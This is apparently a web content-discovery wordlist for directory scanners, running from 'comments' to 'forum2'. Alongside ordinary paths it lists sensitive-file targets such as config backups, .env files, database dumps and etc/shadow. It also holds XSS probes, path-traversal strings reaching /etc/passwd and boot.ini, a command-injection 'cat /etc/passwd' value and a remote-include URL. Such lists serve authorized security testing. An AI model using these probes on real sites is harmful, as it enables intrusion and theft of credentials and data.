comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
commerce
commercial
_common
common
common/config/api.ini
common/config/db.ini
commoncontrols
common.inc
common.xml
_common.xsl
commun
communication
communications
communicator
communicator/
communique.asp
communities
community
community/forumdisplay.php
community/index.php?analized=anything
community/member.php
com/novell/
com/novell/gwmonitor/help/en/default.htm
com/novell/webaccess
com/novell/webaccess/help/en/default.htm
com/novell/webpublisher/help/en/default.htm
comp
compact
companies
company
compare
compare_product
comparison
comparison_list
compat
.compile
compiled
complaint
complaints
compliance
component
components
compose
.composer
composer
composer/installed.json
composer.json
composer.lock
composer.phar
compra/
compras/
compress
compressed
compressed/
compte.php
computer
computers
Computers
computing
com_sun_web_ui
comunicator
con
concrete
conditions
conecta/
.conf
_conf
conf
conf/
conference
conferences
.config
_config
config
config/
Config/
Config1.htm
config/apc.php
config/AppData.config
config/application.ini
config/app.yml
config/aws.yml
config.bak
config/banned_words.txt
config.bat
config/checks.txt
config.codekit
config/config.ini
config.core
../config.dat
config.dat
config/databases.yml
config/database.yml
config/database.yml~
config/database.yml_original
config/database.yml.pgsql
config/database.yml.sqlite3
config/dbconfig.ini
config.dist
config/html/cnf_gi.htm
_config.inc
config.inc
config.inc~
config.inc.bak
config.inc.old
config.inc.php
config.inc.php~
config.inc.php.bak
config.inc.php.dist
config.inc.php-eb
config.inc.php.inc
config.inc.php.inc~
config.inc.php.old
config.inc.php.save
config.inc.php.swp
config.inc.php.templ
config.inc.php.txt
config.inc.txt
config.ini
config.ini.bak
config.ini.old
config.ini.txt
config.json
config.json.cfm
config.local
config/monkcheckout.ini
config/monkdonate.ini
config/monkid.ini
config.old
config.php
config.php~
config.php.bak
config.php.dist
config.php-eb
config.php.inc
config.php.inc~
config.php.old
config.php.save
.config.php.swp
config.php.swp
config.php.templ
config.php.txt
config/producao.ini
config.rb
config/routes.yml
configs
config.save
configs/conf_bdd.ini
configs/conf_zepass.ini
config/settings.inc
config/settings.ini
config/settings.ini.cfm
config/settings.local.yml
config/settings/production.yml
config.swp
config.txt
configuration
configuration/
configuration.ini
configuration.php
configuration.php~
configuration.php.bak
configuration.php.dist
configuration.php.old
configuration.php.save
.configuration.php.swp
configuration.php.swp
configuration.php.templ
configuration.php.txt
configure
config.xml
config.yml
config.yml.templ
confirm
confirmed
confluence/
conf/server.xml
conlib
conn
connect
connect/
connect.inc
connections
connector
connectors
console
console/
console/base/config.json
console/payments/config.json
conspass.chl+
consport.chl+
constant
constants
consulting
consumer
cont
contact
Contact
contact_bean
contact-form
contactinfo
contacto
contacts
contact-us
contact_us
contactus
ContactUs
contao
contato
contenido
content
Content
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
content/base/build/explorer/none.php?/etc/passwd
content/debug.log
contents
contents/extensions/asp/1
contents.php?new_language=elvish&mode=select
contest
contests
contract
.contracts
contracts
contrib
contribute
contributing.md
CONTRIBUTING.md
contributor
contributors.txt
control
controller
controllers
controlpanel
controlpanel.php
controls
converge_local
converse
convert-date.php
cookie
cookies
cookie_usage
cool
copies
copy
COPYING
copyright
copyright-policy
corba
.core
core
core/docs/changelog.txt
coreg
corp
corpo
corporate
corporation
corrections
correo/
count
counter
counter/
counter/1/n/n/0/3/5/0/a/123.gif
counters
country
counts
coupon
coupons
coupons1
course
courses
cover
.coverage
coverage.data
coverage.xml
.coveralls.yml
covers
cp
cp/
cpadmin
.cpan
CPAN
.cpanel/
cpanel
cpanel/
cPanel
cpanel_file
cpanel.php
Cpanel.php
cpanelphpmyadmin/
cpa.nsf
cpath
cpbackup-exclude.conf
cpbt.php
cplogfile.log
cpn.php
cpp
cp.php
cpphpmyadmin/
cpqlogin.htm
cp/rac/nsManager.cgi
.cproject
cps
cpstyles
cpw
cr
crack
crash
crashes
crash.php
create
create_account
createaccount
createbutton
creation
Creatives
creator
credit
credit/
creditcards
credits
CREDITS
crime
crm
crm/
crms
cron
cron/cron.sh
crond/logs/
cronjobs
cron.log
cronlog.txt
cron.php
crons
cron.sh
crontab
crontabs
crossdomain
crossdomain.xml
crs
crtr
crypt
crypto
crypto/
cs
cse
.cshrc
CSNews.cgi
csPassword.cgi?command=remove%20
csproj
_css
css
.csv
csv
.CSV
ct
_cti_pvt/
ctl
cuenta/
cuentas/
culeadora.txt
culture
currency
current
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
custdata/
custom
customavatars
customcode
custom/db.ini
customer
customerdata.nsf
customer_login
customers
customers/
customers.csv
customers.log
customers.mdb
customers.sql
customers.sql.gz
customers.sqlite
customers.txt
customers.xls
customgroupicons
customize
custom-log
custom_log
cute
cutenews/comments.php
cutenews/index.php?debug
cutenews/search.php
cutenews/shownews.php
cutesoft_client
cv
.cvs
cvs
cvs/
.CVS
CVS
CVS/
CVS/Entries
.cvsignore
CVS/Repository
CVS/Root
c/winnt/system32/cmd.exe?/c+dir+/OG
cxf
cy
CYBERDOCS
CYBERDOCS25
CYBERDOCS31
cyberworld
cycle_image
cz
czcmdcvt
d
D
d0maine.php
d0main.php
d0mains.php
da
daemon
daily
dam.php
dan
dana-na
dan_o.dat
da.nsf
dark
dashboard
.dat
dat
dat/
_data
_data/
data
data/
dataBackup/
data/backups/
_database
database
database/
database_admin
database_administration
Database_Administration
Database_Backup/
database_credentials.inc
database.csv
database/db2000.mdb
database.inc
database.log
database.mdb
database/metacart.mdb
database/metacart.mdb+
database.nsf
database.php
databases
databases/
database.sql
database.sqlite
databases.yml
database.txt
database.yml
database.yml~
database.yml_original
database.yml.pgsql
database.yml.sqlite3
databse.sql
data/debug/
_data/error_log
data/files/
datafiles
data/logs/
data.mdb
data/member_log.txt
data-nseries.tsv
dataobject.ini
datas
Data/settings.xml+
data.sql
data.sql.7z
data.sql.bz2
data.sql.gz
data.sqlite
data.sql.rar
data.sql.sql
data.sql.tar
data.sql.tar.bz2
data.sql.tar.bzip2
data.sql.tar.gz
data.sql.tar.gzip
data.sql.tgz
data.sql.zip
data/tmp/
data.tsv
data.txt
data/userlog/log.txt
date
daten
datenschutz
dating
dato/
datos/
dav
davmail.log
day
db
db/
DB
db1.mdb
db1.sqlite
db2
DB4Web/10.10.10.10:100
db.7z
dba
dbabble
dbaccess.log
db-admin
db_admin
dbadmin
dbadmin/
dbadmin.7z
dbadmin.bz2
dbadmin.gz
dbadmin.php
dbadmin.rar
dbadmin.sql
dbadmin.sql.7z
dbadmin.sql.bz2
dbadmin.sql.gz
dbadmin.sql.rar
dbadmin.sql.sql
dbadmin.sql.tar
dbadmin.sql.tar.bz2
dbadmin.sql.tar.bzip2
dbadmin.sql.tar.gz
dbadmin.sql.tar.gzip
dbadmin.sql.tgz
dbadmin.sql.zip
dbadmin.tar
dbadmin.tar.bz2
dbadmin.tar.bzip2
dbadmin.tar.gz
dbadmin.tar.gzip
dbadmin.tgz
dbadmin.zip
dbase
dbase/
dbase.7z
dbase.bz2
dbase.gz
dbase.rar
dbase.sql
dbase.sql.7z
dbase.sql.bz2
dbase.sql.gz
dbase.sql.rar
dbase.sql.sql
dbase.sql.tar
dbase.sql.tar.bz2
dbase.sql.tar.bzip2
dbase.sql.tar.gz
dbase.sql.tar.gzip
dbase.sql.tgz
dbase.sql.zip
dbase.tar
dbase.tar.bz2
dbase.tar.bzip2
dbase.tar.gz
dbase.tar.gzip
dbase.tgz
dbase.zip
dbbackup/
db_backup.7z
db_backup.bz2
db_backup.gz
db_backup.rar
_db_backups
db_backups/
db_backup.sql
db_backup.sql.7z
db_backup.sql.bz2
db_backup.sql.gz
db_backup.sql.rar
db_backup.sql.sql
db_backup.sql.tar
db_backup.sql.tar.bz2
db_backup.sql.tar.bzip2
db_backup.sql.tar.gz
db_backup.sql.tar.gzip
db_backup.sql.tgz
db_backup.sql.zip
db_backup.tar
db_backup.tar.bz2
db_backup.tar.bzip2
db_backup.tar.gz
db_backup.tar.gzip
db_backup.tgz
db_backup.zip
dbboon
db.bz2
db_connect
db.csv
dbdump.7z
dbdump.bz2
dbdump.gz
dbdump.rar
dbdump.sql
dbdump.sql.7z
dbdump.sql.bz2
dbdump.sql.gz
dbdump.sql.rar
dbdump.sql.sql
dbdump.sql.tar
dbdump.sql.tar.bz2
dbdump.sql.tar.bzip2
dbdump.sql.tar.gz
dbdump.sql.tar.gzip
dbdump.sql.tgz
dbdump.sql.zip
dbdump.tar
dbdump.tar.bz2
dbdump.tar.bzip2
dbdump.tar.gz
dbdump.tar.gzip
dbdump.tgz
dbdump.zip
dbfix/
db-full.mysql
dbg
db.gz
dbi
db.inc
db.ini
dblclk
db.log
dbm
db/main.mdb
dbman
db.mdb
dbmodules
dbms
db.nsf
db.php
db.php?q='&t='
db.properties
db.rar
db.sql
db.sql.7z
db.sql.bz2
db.sql.gz
db.sqlite
db.sql.rar
db.sql.sql
db.sql.tar
db.sql.tar.bz2
db.sql.tar.bzip2
db.sql.tar.gz
db.sql.tar.gzip
db.sql.tgz
db.sql.zip
db.tar
db.tar.bz2
db.tar.bzip2
db.tar.gz
db.tar.gzip
db.tgz
db/users.dat
dbutil
db.zip
dc
dc/auth_data/auth_user_file.txt
dcforum
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
dclf.nsf
dclk
dc/orders/orders.txt
dcp/advertiser.php
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
de
dead.letter
deal
dealer
dealers
deals
DEASAppDesign.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
DEASLog.nsf
debian
debug
debug/
debug/dbg?host==<script>alert('Vulnerable');</script>
debug/echo?name=<script>alert('Vulnerable');</script>
debug/errorInfo?title===<script>alert('Vulnerable');</script>
debug_error.jsp
debug.inc
debug.log
debug-output.txt
debug.php
debug/showproc?proc===<script>alert('Vulnerable');</script>
debug.txt
dec
decl
declaration
declarations
decode
decoder
decrypt
decrypted
decryption
decsadm.nsf
decsdoc.nsf
decslog.nsf
de_DE
DEESAdmin.nsf
def
default
Default
default_icon
default_image
default_logo
default.nsf
default_page
default_pages
default.php
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
defaults
defines.php
definition
definitions
del
delete
deleted
deleteme
delete.php
deletion
delicious
demo
demo/
demo2
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
demo/ejb/index.html
demo/ojspext/events/globals.jsa
demo.php
demos
demos/
demo/sql/index.jsp
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
denied
deny
departments
deploy
.deployignore
deployment
deploy.rb
_derived
descargas
Descript.ion
design
designs
desktop
desktop/index_framed.htm
Desktop.ini
desktopmodules
desktops
destinations
detail
details
deutsch
.dev/
_dev
dev
dev/
dev2
dev60cgi
devel
devel/
develop
developement
developer
developers
development
development/
development.esproj/
development.log
development-parts/
device
devices
dev.php
devs
devtools
dev/translations.php
df
df_main.sql
dh_
dh_phpmyadmin
di
diag
diagnostics
dial
dialog
dialogs
diapo.php?rep=<script>alert(document.cookie)</script>
diary
dictionary
diff
diffs
dig
digest
digg
digital
dir
dir/
dirassist.nsf
dirb
dirbmark
direct
directadmin
directions
directories
directorio
.directory
directory
directory/
directory.php?dir=%3Bcat%20/etc/passwd
dir-login
dir.php
dir-prop-base
dirs
disabled
disallow
disclaimer
disclosure
discootra
discount
discovery
discus
discuss
discussion
disdls
disk
dispatch
dispatcher
display
display_vvcodes
dist
dist/
divider
django
dk
dl
dll
dltclnt.php
dm
dm-config
dmdocuments
DMR/
dms
dms0
DMSDump
dns
do
doc
doc/
doc/admin/index.php
doc/domguide.nsf
doc/dspug.nsf
docebo
docedit
doc/help4.nsf
doc/helpadmin.nsf
doc/helplt4.nsf
doc-html/
doc/internet.nsf
doc/javapg.nsf
dock
docker-compose.yml
Dockerfile
.dockerignore
doc/lccon.nsf
doc/migrate.nsf
docnote
doc/npn_admn.nsf
doc/npn_rn.nsf
doc/packages/
doc/readmec.nsf
doc/readmes.nsf
docroot
doc/rt/overview-summary.html
docs
docs/
docs41
docs51
doc/smhelp.nsf
docs/NED
docs/NED?action=retrieve&location=.
doc/srvinst.nsf
docs/<script>alert('Vulnerable');</script>
docs/sdb/en/html/index.html
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
doctrine/schema/eirec.yml
doctrine/schema/tmx.yml
document
documentation
documentation/config.yml
document_library
documents
Documents and Settings
doc/webmin.config.notes
doinfo
doit
dokuwiki
doladmin.nsf
dologin
dols_help.nsf
domadmin.nsf
domain
DomainFiles/*//../../../../../../../../../../etc/passwd
domains
do_map
domcfg.nsf
domguide.nsf
domlog.nsf
dom.php
donate
donations
done
dostuff.php?action=modify_user
do_subscribe
dot
dotproject/modules/files/index_table.php
dotproject/modules/projects/addedit.php
dotproject/modules/projects/view.php
dotproject/modules/projects/vw_files.php
dotproject/modules/tasks/addedit.php
dotproject/modules/tasks/viewgantt.php
double
doubleclick
down
down/
download
download/
Download
downloader
downloader/cache.cfg
downloader/connect.cfg
download/history.csv
download.php
download.php?op=viewdownload
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
download_private
downloads
downloads/
Downloads
downloads/dom.php
downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
download/users.csv
downsys
d.php
draft
drafts
dragon
dra.php
draver
driver
drivers
drop
dropped
drupal
ds
dspug.nsf
.DS_Store
_dummy
dummy
dummy.php
.dump
dump
dump/
dump.7z
dump.bz2
dumpenv
dumper/
dumper.php
dump_file.sql
dump.gz
dump.inc
dump.inc.old
dump.log
dump.old
dump.rar
dump.rdb
dumps
dumps/
dump.sql
Dump.sql
dump.sql.7z
dump.sql.bz2
dump.sql.gz
dump.sqlite
dump.sql.old
dump.sql.tar
dump.sql.tar.bz2
dump.sql.tar.bzip2
dump.sql.tar.gz
dump.sql.tar.gzip
dump.sql.tgz
dump.sql.zip
dump.tar
dump.tar.bz2
dump.tar.bzip2
dump.tar.gz
dump.tar.gzip
dump.tgz
dumpuser
dumpuser.aspx
dump.zip
dvd
dwr
dyn
dynamic
dyop_addtocart
dyop_delete
dyop_quan
dz0.php
dz1.php
dz.php
e
E
e107_admin
e107_files
e107_handlers
e2fs
ear
easy
easylog/easylog.html
ebay
eblast
ebook
ebooks
ebriefs
ec
ecard
ecards
echannel
.eclipse
ecommerce
ecosystem.json
ecrire
edge
edgy
edit
editaddress
edit_link
editor
.editorconfig
editor/FCKeditor
editorial
editorials
editor.php
editors
editors/FCKeditor
editor/stats/
editor/tiny_mce/
editor/tinymce/
edit.php
editpost
edit_profile
edits
edit/spaw2/dialogs/dialog.php
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
edp
edu
education
Education
ee
effort
efforts
egress
ehdaa
ehthumbs.db
ejb
ejemplo/
ejemplos/
el
.elasticbeanstalk/
.elb
.elc
electronics
element
elements
elfinder/elfinder.php
elim/blist.xml
elmar
em
.emacs.desktop
.emacs.desktop.lock
e-mail
email
email-addresses
email-a-friend
emailafriend
emailer
emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
emailhandler
emailing
email.php
emailproduct
emails
emailsignup
emailtemplates
embed
embedd
embedded
emea
emergency
emml_email_func.php
emoticons
employee
employees
employees/
employers
employment
empty
.empty-folder
emu
emulator
emul.js
emumail.cgi?type=.%00
en
enable-cookies
enc
encode
encoder
encrypt
encrypted
encryption
encyption
end
enduser
endusers
energy
enews
eng
engine
engine/classes/swfupload/swfupload_f9.swf
engine/classes/swfupload/swfupload.swf
engine/libs/spaw/dialogs/dialog.php
engines
english
English
enterprise
entertainment
Entertainment
enteteacceuil.php
entete.php
entries
Entries
entropybanner
entry
en_us
en_US
.env
env
.env-example
envia/
enviamail/
environ
.environment
environment
environment.rb
.env.php
.env.sample.php
ep
eproducts
equipment
eric
err
erraddsave
errata
error
error/
error404
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
error_docs
errordocs
error-espanol
error.html
error/HTTP_NOT_FOUND.html.var
.error_log
error-log
error.log
error_log
errorlog
error.log.0
error_log.gz
error-log.txt
error_log.txt
error_message
errorpage
error_pages
errorpages
_errors
errors
errors/
errors/creation
errors/local.xml
errors.log
errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
errors.txt
error.txt
erros
es
es/
esale
esales
es_ES
.esformatter
eshop
.eslintignore
.eslintrc
esp
espanol
esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
.espressostorage
established
estilos
e-store
estore
esupport
et
./../../../../../../../../../etc/*
etc
etc/config.ini
etc/database.xml
etc/hosts
./../../../../../../../../../etc/passw*
................../etc/passwd
.../.../.../.../.../.../.../.../.../.../etc/passwd
../../../../../../../../../../etc/passwd
etc/passwd
etc/shadow+
ethics
eu
eudora.ini
eula_en.txt
eula.txt
europe
evb
event
eventcal2.php.php
event.nsf
events
Events
events4.nsf
events5.nsf
events.nsf
eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
evil
evt
ewebeditor
ews
ews/ews/architext_query.pl
ex
example
example.php
examples
examples/
examples/basic/servlet/HelloServlet
examples/context
examples/cookie
examples/forward1
examples/forward2
examples/header
examples/include1
examples/info
examples/jsp/index.html
examples/jsp/snp/anything.snp
examples/jsp/snp/snoop.jsp
examples/jsp/source.jsp??
examples/servlet/AUX
examples/servlets/index.html
examples/servlet/TroubleShooter
examples/session
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
excalibur
excel
excel/
Excel/
exception_log
exch
exchange
exchange/
exchange/lib/AMPROPS.INC
exchange/lib/ATTACH.INC
exchange/lib/DELETE.INC
exchange/lib/GETREND.INC
exchange/lib/GETWHEN.INC
exchange/lib/JSATTACH.INC
exchange/lib/JSROOT.INC
exchange/lib/JSUTIL.INC
exchange/lib/LANG.INC
exchange/lib/logon.inc
exchange/lib/PAGEUTIL.INC
exchange/lib/PUBFLD.INC
exchange/lib/RENDER.INC
exchange/lib/SESSION.INC
exchange/root.asp?acs=anon
exchweb
exclude
exe
exe/
EXE/
exec
exec/show/config/cr
executable
executables
exiar
exit
exp/
expert
experts
exploits
explore
explorer
export
export/
export_log.old.txt
export_log.txt
exports
export_stock_log.txt
ext
ext2
ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
extension
extensions
extern
external
.external/data
externalid
externalisation
externalization
.externalToolBuilders/
ext.ini.%00.txt
extra
extranet
Extranet
extras
ez
ez2000/ezadmin.cgi
ez2000/ezboard.cgi
ez2000/ezman.cgi
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
ezshopper
ezsqliteadmin
f
F
fa
fabric
face
facebook
faces
facts
faculty
fail
failed
failure
fake
family
fancybox
faq
FAQ
faqman/index.php
faqs
fashion
favicon.ico
favorite
favorites
fb
.FBCIndex
fbook
fbsd/
fc
fcategory
fcgi
fcgi-bin
fcgi-bin/echo
fcgi-bin/echo2
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
fck
fckeditor
FCKeditor
FCKeditor/
FCKeditor2/
FCKeditor2.0/
FCKeditor20/
FCKeditor2.1/
FCKeditor21/
FCKeditor2.2/
FCKeditor22/
FCKeditor2.3/
FCKeditor23/
FCKeditor2.4/
FCKeditor24/
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
fckeditor/editor/filemanager/connectors/asp/connector.asp
fckeditor/editor/filemanager/connectors/asp/upload.asp
fckeditor/editor/filemanager/connectors/aspx/connector.aspx
fckeditor/editor/filemanager/connectors/aspx/upload.aspx
fckeditor/editor/filemanager/connectors/php/connector.php
fckeditor/editor/filemanager/connectors/php/upload.php
fckeditor/editor/filemanager/upload/asp/upload.asp
fckeditor/editor/filemanager/upload/aspx/upload.aspx
fckeditor/editor/filemanager/upload/php/upload.php
fdcp
feature
featured
features
fedora
feed
feedback
feedback_js
feeds
felix
fetch
ffftp.ini
.fhp
fi
field
fields
file
file/
fileadmin
fileadmin/
fileadmin.php
filedump/
file/../../../../../../../../etc/
filelist
file_manager/
filemanager
filemanager/
filemanager/filemanager_forms.php
filemanager/index.php3
filemgmt/brokenfile.php
filemgmt/singlefile.php
filemgmt/viewcat.php
filemgmt/visit.php
.filemgr-tmp
file.php
_files
files
files/
files.md5
file.sql
filesystem
file-that-is-not-real-2002.php3
file_upload/
fileupload
fileupload/
file_upload.asp
file_upload.aspx
file_upload.cfm
file_upload.htm
file_upload.html
file_upload.php
file_upload.php3
fileuploads
file_upload.shtm
filez
film
films
filter
finance
finances.xls
finance.xls
financial
find
finger
finishorder
firefox
firewall
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
firewalls
firmconnect
firms
firmware
first
.fishsrv.pl
fixed
fk
fla
.flac
flag
flags
_flash
flash
flashFXP.ini
flash-intro
flex
flights
flow
.flowconfig
flowplayer
flows
flv
flvideo
flyspray
fm
fn
focus
foia
folder
folder_new
folders
font
.fontconfig/
.fontcustom-manifest.json
fonts
foo
food
foo.php3
football
footer
footers
for
forcedownload
forget
forgot
forgot-password
forgot_password
forgotpassword
forgot_password.php?email=\"><script>alert(document.cookie)</script>
forgotten
form
format
formatting
formhandler
formmail
forms
forms1
formsend
formslogin
formupdate
foro
foros
foro/YaBB.pl
forrest
fortune
forum
forum/
forum1
forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
forum1.asp?n=1753&amp;nn=/....../boot.ini
forum1.asp?n=1753&amp;nn=/..../boot.ini
forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1.asp?n=1753&amp;nn=c:\boot.ini
forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
forum1.asp?n=1753&amp;nn=/etc/passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
forum1.asp?n=1753&amp;nn=/etc/passwd%00
forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum2
